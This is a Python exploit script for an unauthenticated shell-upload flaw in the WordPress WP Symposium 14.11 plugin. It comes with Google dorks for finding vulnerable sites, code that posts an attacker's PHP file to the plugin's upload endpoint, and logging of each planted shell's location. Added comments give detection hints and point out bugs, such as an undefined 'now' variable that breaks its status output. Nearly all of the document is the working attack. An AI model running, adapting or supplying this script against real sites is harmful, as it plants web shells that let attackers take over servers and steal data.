#!/usr/bin/python
#-------------------------------------------------------------------------------
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
# Vulnerability discovered by Claudio Viviani - http://www.homelab.it
# Exploit written by Claudio Viviani / Edited INURL - BRASIL
# 2014-11-27: Discovered vulnerability
# 2014-12-01: Vendor Notification (Twitter)
# 2014-12-02: Vendor Notification (Web Site)
# 2014-12-04: Vendor Notification (E-mail)
# 2014-12-11: No Response/Feedback
# 2014-12-11: Published
# DORK: index of "wp-symposium"
# DORK: inurl:"plugins/wp-symposium" -site:wordpress.org
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#-------------------------------------------------------------------------------
import urllib, urllib2, socket | |
import sys | |
import string, random | |
import optparse | |
import os, os.path, mimetypes | |
from datetime import datetime | |
def checkurl(url):
    """Return *url* unchanged when it starts with http:// or https://.

    Any other value prints an error line and terminates the process with
    exit status 1; no URL is ever returned in that case.
    """
    if not url.startswith(("http://", "https://")):
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    return url
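def checkfile(file):
    """Return *file* when it is an existing, readable regular file.

    Otherwise print an error line and exit with status 1. The original
    joined the two checks with ``and``, which let an existing but
    unreadable file through to a later IOError; either failing condition
    is now sufficient to reject the path. ``print(...)`` with a single
    argument is used so the line is valid under both Python 2 and 3.
    """
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] '+file+' file is missing or not readable')
        sys.exit(1)
    return file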
# Get file's mimetype
def get_content_type(filename):
    """Guess a MIME type from *filename*'s extension.

    Falls back to ``application/octet-stream`` when ``mimetypes`` cannot
    determine a type.
    """
    guessed, _encoding = mimetypes.guess_type(filename)
    if not guessed:
        return 'application/octet-stream'
    return guessed
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Return a string of *size* characters drawn with replacement from *chars*.

    Uses ``random.choice`` (the non-cryptographic PRNG); the only use in
    this file is to produce the remote directory and file names.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
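# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
    """Build the multipart/form-data body for the upload request.

    Parts, in dict iteration order: ``uploader_uid`` (fixed ``'1'``),
    ``uploader_dir`` (``'./' + randDirName``), ``uploader_url`` (the
    module-level ``url_symposium_upload``), then one file part named
    ``files[]`` whose filename is ``randShellName + '.php'`` and whose
    content is read from *payloadname*. The boundary is hard-coded and has
    to match the one in the module-level ``content_type`` header.

    Returns the body as a single CRLF-joined string. The local file is now
    read inside a ``with`` block so its handle is closed deterministically
    instead of being left to the garbage collector.
    """
    getfields = dict()
    getfields['uploader_uid'] = '1'
    getfields['uploader_dir'] = './'+randDirName
    getfields['uploader_url'] = url_symposium_upload
    with open(payloadname) as payload:
        payloadcontent = payload.read()
    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
    CRLF = '\r\n'
    L = []
    for (key, value) in getfields.items():
        L.append('--' + LIMIT)
        L.append('Content-Disposition: form-data; name="%s"' % key)
        L.append('')
        L.append(value)
    L.append('--' + LIMIT)
    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
    L.append('Content-Type: %s' % get_content_type(payloadname))
    L.append('')
    L.append(payloadcontent)
    L.append('--' + LIMIT + '--')
    L.append('')
    body = CRLF.join(L)
    return body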
# ---------------------------------------------------------------------------
# Script body. Everything below runs at import time (there is no
# ``if __name__ == "__main__"`` guard).
# Risk note for defenders: the request built here carries no cookie or
# authorization header (see ``headers`` below), i.e. the PoC is
# unauthenticated; the only remediation reference on this page is the
# "Video Demo + Fix" link in the file header.
# ---------------------------------------------------------------------------
banner = """
0x[EXPLOIT NAME]: Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11 / INURL - BRASIL
------------------------------------------------------------------------------------------------------------------
"""
# Command-line options: target base URL, local file to send, socket timeout.
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('-f', '--file', action="store",
                       help="Insert file name, ex: shell.php",
                       )
commandList.add_option('--timeout', action="store", default=10, type="int",
                       help="[Timeout Value] - Default 10",
                       )
# ``remainder`` (positional args) is never used.
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
# Endpoint the PoC posts to. Detection hint: a POST to
# ``/wp-content/plugins/wp-symposium/server/php/index.php`` carrying an
# ``uploader_dir`` form field and a ``files[]`` part with a ``.php``
# filename is the exact shape of this request.
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
# NOTE: the boundary here must stay identical to LIMIT inside
# create_body_sh3ll_upl04d; the two are kept in sync by hand.
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
# Random names for the remote directory and file (see id_generator).
randDirName = id_generator()
randShellName = id_generator()
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
# Only a browser-like User-Agent and the multipart headers are sent.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }
try:
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()
    # Outcome is inferred from the response body alone: a body containing
    # "error", exactly "0", or empty is treated as failure.
    # NOTE(review): ``now`` is never bound anywhere in this file (``datetime``
    # is imported but unused), so every print below that references it
    # raises NameError.
    if "error" in read or read == "0" or read == "":
        print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][NOT VULN]: Upload Failed :(")
    else:
        print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][VALUE]: Shell Uploaded")
        print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][VALUE]: Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
        # Appends the computed location to a local log file. The file is
        # opened for reading with no existence check (IOError on a first
        # run, and IOError is not among the exceptions caught below), and
        # that first handle is never closed before the path is reopened
        # for writing.
        arquivo = open('Sh311_Upl04d_Vuln3r4b1l1ty.txt', 'r')
        texto = arquivo.readlines()
        texto.append(url_symposium_upload+randDirName+randShellName+".php")
        arquivo = open('Sh311_Upl04d_Vuln3r4b1l1ty.txt', 'w')
        arquivo.writelines(texto)
        arquivo.close()
# Only HTTP-level and connection-level errors are handled; everything else
# (including the NameError noted above) propagates as a traceback.
except urllib2.HTTPError as e:
    print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][ERROR]: "+str(e))
except urllib2.URLError as e:
    print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][ERROR]: Connection Error: "+str(e))